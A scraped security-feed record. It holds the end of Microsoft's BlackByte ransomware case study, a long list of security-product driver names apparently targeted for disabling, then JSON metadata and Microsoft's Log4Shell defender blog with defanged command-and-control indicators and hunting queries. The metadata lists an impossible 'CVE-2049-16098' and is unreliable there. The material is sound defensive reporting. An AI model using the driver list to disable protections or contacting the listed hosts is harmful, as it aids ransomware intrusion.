inisbdrv64.sys| ino_fltr.sys| intelcas.sys \nintmfs.sys| inuse.sys| invprotectdrv.sys| invprotectdrv64.sys| ionmonwdrv.sys \niothorfs.sys| ipcomfltr.sys| ipfilter.sys| iprotect.sys| iridiumswitch.sys \nirongatefd.sys| isafekrnl.sys| isafekrnlmon.sys| isafermon| isecureflt.sys \nisedrv.sys| isfpdrv.sys| isirmfmon.sys| isregflt.sys| isregflt64.sys \nissfltr.sys| issregistry.sys| it2drv.sys| it2reg.sys| ivappmon.sys \niwdmfs.sys| iwhlp.sys| iwhlp2.sys| iwhlpxp.sys| jdppsf.sys \njdppwf.sys| jkppob.sys| jkppok.sys| jkpppf.sys| jkppxk.sys \nk7sentry.sys| kavnsi.sys| kawachfsminifilter.sys| kc3.sys| kconv.sys \nkernelagent32.sys| kewf.sys| kfac.sys| kfileflt.sys| kisknl.sys \nklam.sys| klbg.sys| klboot.sys| kldback.sys| kldlinf.sys \nkldtool.sys| klfdefsf.sys| klflt.sys| klgse.sys| klhk.sys \nklif.sys| klifaa.sys| klifks.sys| klifsm.sys| klrsps.sys \nklsnsr.sys| klupd_klif_arkmon.sys| kmkuflt.sys| kmnwch.sys| kmxagent.sys \nkmxfile.sys| kmxsbx.sys| ksfsflt.sys| ktfsfilter.sys| ktsyncfsflt.sys \nkubwksp.sys| lafs.sys| lbd.sys| lbprotect.sys| lcgadmon.sys \nlcgfile.sys| lcgfilemon.sys| lcmadmon.sys| lcmfile.sys| lcmfilemon.sys \nlcmprintmon.sys| ldsecdrv.sys| libwamf.sys| livedrivefilter.sys| llfilter.sys \nlmdriver.sys| lnvscenter.sys| locksmith.sys| lragentmf.sys| lrtp.sys \nmagicbackupmonitor.sys| magicprotect.sys| majoradvapi.sys| marspy.sys| maxcryptmon.sys \nmaxproc64.sys| maxprotector.sys| mbae64.sys| mbam.sys| mbamchameleon.sys \nmbamshuriken.sys| mbamswissarmy.sys| mbamwatchdog.sys| mblmon.sys| mcfilemon32.sys \nmcfilemon64.sys| mcstrg.sys| mearwfltdriver.sys| message.sys| mfdriver.sys \nmfeaack.sys| mfeaskm.sys| mfeavfk.sys| mfeclnrk.sys| mfeelamk.sys \nmfefirek.sys| mfehidk.sys| mfencbdc.sys| mfencfilter.sys| mfencoas.sys \nmfencrk.sys| mfeplk.sys| mfewfpk.sys| miniicpt.sys| minispy.sys \nminitrc.sys| mlsaff.sys| mmpsy32.sys| mmpsy64.sys| monsterk.sys \nmozycorpfilter.sys| mozyenterprisefilter.sys| mozyentfilter.sys| mozyhomefilter.sys| mozynextfilter.sys \nmozyoemfilter.sys| mozyprofilter.sys| mpfilter.sys| mpkernel.sys| mpksldrv.sys \nmpxmon.sys| mracdrv.sys| mrxgoogle.sys| mscan-rt.sys| msiodrv4.sys \nmsixpackagingtoolmonitor.sys| msnfsflt.sys| mspy.sys| mssecflt.sys| mtsvcdf.sys \nmumdi.sys| mwac.sys| mwatcher.sys| mwfsmfltr.sys| mydlpmf.sys \nnamechanger.sys| nanoavmf.sys| naswsp.sys| ndgdmk.sys| neokerbyfilter \nnetaccctrl.sys| netaccctrl64.sys| netguard.sys| netpeeker.sys| ngscan.sys \nnlcbhelpi64.sys| nlcbhelpx64.sys| nlcbhelpx86.sys| nlxff.sys| nmlhssrv01.sys \nnmpfilter.sys| nntinfo.sys| novashield.sys| nowonmf.sys| npetw.sys \nnprosec.sys| npxgd.sys| npxgd64.sys| nravwka.sys| nrcomgrdka.sys \nnrcomgrdki.sys| nregsec.sys| nrpmonka.sys| nrpmonki.sys| nsminflt.sys \nnsminflt64.sys| ntest.sys| ntfsf.sys| ntguard.sys| ntps_fa.sys \nnullfilter.sys| nvcmflt.sys| nvmon.sys| nwedriver.sys| nxfsmon.sys \nnxrmflt.sys| oadevice.sys| oavfm.sys| oczminifilter.sys| odfsfilter.sys \nodfsfimfilter.sys| odfstokenfilter.sys| offsm.sys| omfltlh.sys| osiris.sys \nospfile_mini.sys| ospmon.sys| parity.sys| passthrough.sys| path8flt.sys \npavdrv.sys| pcpifd.sys| pctcore.sys| pctcore64.sys| pdgenfam.sys \npecfilter.sys| perfectworldanticheatsys.sys| pervac.sys| pfkrnl.sys| pfracdrv.sys \npgpfs.sys| pgpwdefs.sys| phantomd.sys| phdcbtdrv.sys| pkgfilter.sys \npkticpt.sys| plgfltr.sys| plpoffdrv.sys| pointguardvista64f.sys| pointguardvistaf.sys \npointguardvistar32.sys| pointguardvistar64.sys| procmon11.sys| proggerdriver.sys| psacfileaccessfilter.sys \npscff.sys| psgdflt.sys| psgfoctrl.sys| psinfile.sys| psinproc.sys \npsisolator.sys| pwipf6.sys| pwprotect.sys| pzdrvxp.sys| qdocumentref.sys \nqfapflt.sys| qfilter.sys| qfimdvr.sys| qfmon.sys| qminspec.sys \nqmon.sys| qqprotect.sys| qqprotectx64.sys| qqsysmon.sys| qqsysmonx64.sys \nqutmdrv.sys| ranpodfs.sys| ransomdefensexxx.sys| ransomdetect.sys| reaqtor.sys \nredlight.sys| regguard.sys| reghook.sys| regmonex.sys| repdrv.sys \nrepmon.sys| revefltmgr.sys| reveprocprotection.sys| revonetdriver.sys| rflog.sys \nrgnt.sys| rmdiskmon.sys| rmphvmonitor.sys| rpwatcher.sys| rrmon32.sys \nrrmon64.sys| rsfdrv.sys| rsflt.sys| rspcrtw.sys| rsrtw.sys \nrswctrl.sys| rswmon.sys| rtologon.sys| rtw.sys| ruaff.sys \nrubrikfileaudit.sys| ruidiskfs.sys| ruieye.sys| ruifileaccess.sys| ruimachine.sys \nruiminispy.sys| rvsavd.sys| rvsmon.sys| rw7fsflt.sys| rwchangedrv.sys \nryfilter.sys| ryguard.sys| safe-agent.sys| safsfilter.sys| sagntflt.sys \nsahara.sys| sakfile.sys| sakmfile.sys| samflt.sys| samsungrapidfsfltr.sys \nsanddriver.sys| santa.sys| sascan.sys| savant.sys| savonaccess.sys \nscaegis.sys| scauthfsflt.sys| scauthiodrv.sys| scensemon.sys| scfltr.sys \nscifsflt.sys| sciptflt.sys| sconnect.sys| scred.sys| sdactmon.sys \nsddrvldr.sys| sdvfilter.sys| se46filter.sys| secdodriver.sys| secone_filemon10.sys \nsecone_proc10.sys| secone_reg10.sys| secone_usb.sys| secrmm.sys| secufile.sys \nsecure_os.sys| secure_os_mf.sys| securofsd_x64.sys| sefo.sys| segf.sys \nsegiraflt.sys| segmd.sys| segmp.sys| sentinelmonitor.sys| serdr.sys \nserfs.sys| sfac.sys| sfavflt.sys| sfdfilter.sys| sfpmonitor.sys \nsgresflt.sys| shdlpmedia.sys| shdlpsf.sys| sheedantivirusfilterdriver.sys| sheedselfprotection.sys \nshldflt.sys| si32_file.sys| si64_file.sys| sieflt.sys| simrep.sys \nsisipsfilefilter| sk.sys| skyamdrv.sys| skyrgdrv.sys| skywpdrv.sys \nslb_guard.sys| sld.sys| smbresilfilter.sys| smdrvnt.sys| sndacs.sys \nsnexequota.sys| snilog.sys| snimg.sys| snscore.sys| snsrflt.sys \nsodatpfl.sys| softfilterxxx.sys| soidriver.sys| solitkm.sys| sonar.sys \nsophosdt2.sys| sophosed.sys| sophosntplwf.sys| sophossupport.sys| spbbcdrv.sys \nspellmon.sys| spider3g.sys| spiderg3.sys| spiminifilter.sys| spotlight.sys \nsprtdrv.sys| sqlsafefilterdriver.sys| srminifilterdrv.sys| srtsp.sys| srtsp64.sys \nsrtspit.sys| ssfmonm.sys| ssrfsf.sys| ssvhook.sys| stcvsm.sys \nstegoprotect.sys| stest.sys| stflt.sys| stkrnl64.sys| storagedrv.sys \nstrapvista.sys| strapvista64.sys| svcbt.sys| swcommfltr.sys| swfsfltr.sys \nswfsfltrv2.sys| swin.sys| symafr.sys| symefa.sys| symefa64.sys \nsymefasi.sys| symevent.sys| symevent64x86.sys| symevnt.sys| symevnt32.sys \nsymhsm.sys| symrg.sys| sysdiag.sys| sysmon.sys| sysmondrv.sys \nsysplant.sys| szardrv.sys| szdfmdrv.sys| szdfmdrv_usb.sys| szedrdrv.sys \nszpcmdrv.sys| taniumrecorderdrv.sys| taobserveflt.sys| tbfsfilt.sys| tbmninifilter.sys \ntbrdrv.sys| tdevflt.sys| tedrdrv.sys| tenrsafe2.sys| tesmon.sys \ntesxnginx.sys| tesxporter.sys| tffregnt.sys| tfsflt.sys| tgfsmf.sys \nthetta.sys| thfilter.sys| threatstackfim.sys| tkdac2k.sys| tkdacxp.sys \ntkdacxp64.sys| tkfsavxp.sys| tkfsavxp64.sys| tkfsft.sys| tkfsft64.sys \ntkpcftcb.sys| tkpcftcb64.sys| tkpl2k.sys| tkpl2k64.sys| tksp2k.sys \ntkspxp.sys| tkspxp64.sys| tmactmon.sys| tmcomm.sys| tmesflt.sys \ntmevtmgr.sys| tmeyes.sys| tmfsdrv2.sys| tmkmsnsr.sys| tmnciesc.sys \ntmpreflt.sys| tmumh.sys| tmums.sys| tmusa.sys| tmxpflt.sys \ntopdogfsfilt.sys| trace.sys| trfsfilter.sys| tritiumfltr.sys| trpmnflt.sys \ntrufos.sys| trustededgeffd.sys| tsifilemon.sys| tss.sys| tstfilter.sys \ntstfsredir.sys| tstregredir.sys| tsyscare.sys| tvdriver.sys| tvfiltr.sys \ntvmfltr.sys| tvptfile.sys| tvspfltr.sys| twbdcfilter.sys| txfilefilter.sys \ntxregmon.sys| uamflt.sys| ucafltdriver.sys| ufdfilter.sys| uncheater.sys \nupguardrealtime.sys| usbl_ifsfltr.sys| usbpdh.sys| usbtest.sys| uvmcifsf.sys \nuwfreg.sys| uwfs.sys| v3flt2k.sys| v3flu2k.sys| v3ift2k.sys \nv3iftmnt.sys| v3mifint.sys| varpffmon.sys| vast.sys| vcdriv.sys \nvchle.sys| vcmfilter.sys| vcreg.sys| veeamfct.sys| vfdrv.sys \nvfilefilter.sys| vfpd.sys| vfsenc.sys| vhddelta.sys| vhdtrack.sys \nvidderfs.sys| vintmfs.sys| virtfile.sys| virtualagent.sys| vk_fsf.sys \nvlflt.sys| vmwvvpfsd.sys| vollock.sys| vpdrvnt.sys| vradfil2.sys \nvraptdef.sys| vraptflt.sys| vrarnflt.sys| vrbbdflt.sys| vrexpdrv.sys \nvrfsftm.sys| vrfsftmx.sys| vrnsfilter.sys| vrsdam.sys| vrsdcore.sys \nvrsdetri.sys| vrsdetrix.sys| vrsdfmx.sys| vrvbrfsfilter.sys| vsepflt.sys \nvsscanner.sys| vtsysflt.sys| vxfsrep.sys| wats_se.sys| wbfilter.sys \nwcsdriver.sys| wdcfilter.sys| wdfilter.sys| wdocsafe.sys| wfp_mrt.sys \nwgfile.sys| whiteshield.sys| windbdrv.sys| windd.sys| winfladrv.sys \nwinflahdrv.sys| winfldrv.sys| winfpdrv.sys| winload.sys| winteonminifilter.sys \nwiper.sys| wlminisecmod.sys| wntgpdrv.sys| wraekernel.sys| wrcore.sys \nwrcore.x64.sys| wrdwizfileprot.sys| wrdwizregprot.sys| wrdwizscanner.sys| wrdwizsecure64.sys \nwrkrn.sys| wrpfv.sys| wsafefilter.sys| wscm.sys| xcpl.sys \nxendowflt.sys| xfsgk.sys| xhunter1.sys| xhunter64.sys| xiaobaifs.sys \nxiaobaifsr.sys| xkfsfd.sys| xoiv8x64.sys| xomfcbt8x64.sys| yahoostorage.sys \nyfsd.sys| yfsd2.sys| yfsdr.sys| yfsrd.sys| zampit_ml.sys \nzesfsmf.sys| zqfilter.sys| zsfprt.sys| zwasatom.sys| zwpxesvr.sys \nzxfsfilt.sys| zyfm.sys| zzpensys.sys| | \n \n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>. \n\nThe post [The five-day job: A BlackByte ransomware intrusion case study](<https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T17:00:00", "type": "mmpc", "title": "The five-day job: A BlackByte ransomware intrusion case study", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16098", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2049-16098"], "modified": "2023-07-06T17:00:00", "id": "MMPC:0BCDCF68488C6A934B5C605C26DDC90F", "href": "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T21:30:14", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) has presented a new attack vector and gained broad attention due to its severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. **Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n * Threat and vulnerability management\n * Discovering affected components, software, and devices via a unified Log4j dashboard\n * Applying mitigation directly in the Microsoft 365 Defender portal\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for servers\n * Microsoft Defender for Containers\n * Microsoft Sentinel queries\n * RiskIQ EASM and Threat Intelligence\n 3. **Detecting and responding to exploitation attempts and other related attacker activity**\n * Microsoft 365 Defender\n * Microsoft Defender Antivirus\n * Microsoft Defender for Endpoint\n * Microsoft Defender for Cloud Apps\n * Microsoft Defender for Office 365\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for IoT\n * Microsoft Sentinel\n * Microsoft Sentinel queries\n * Azure Firewall Premium\n * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/code-1b-61ba3a0a1e83c.png)\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/code-2b-61ba3a126ec26.png)\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. Attackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend affected customers to apply security updates released by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many supplier\u2019s products challenge defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n![Screenshot of Threat and Vulnerability Management recommendation](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-TVM-n0.png)\n\n_Figure 1. Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** > **Dashboard** > **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n![Screenshot of consolidated vulnerability view for Log4j in Threat and Vulnerability Management](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-TVM-n1-1024x538.png)\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n![Screenshot of threat and vulnerability management showing vulnerable files](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-TVM-n2-1024x538.png)\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n![Screenshot of threat and vulnerability management showing exposed devices](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/Log4j-TVM-n3-1024x538.png)\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n![Screenshot of software inventory in Microsoft Defender for Endpoint](https://www.microsoft.com/security/blog/uploads/securityprod/2021/12/CVE-2021-44228-Log4j-software-inventory-1024x282.png)\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. These new capabilities provide security teams with the following:\n\n 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.\n\nTo use this feature, open the [Exposed devices 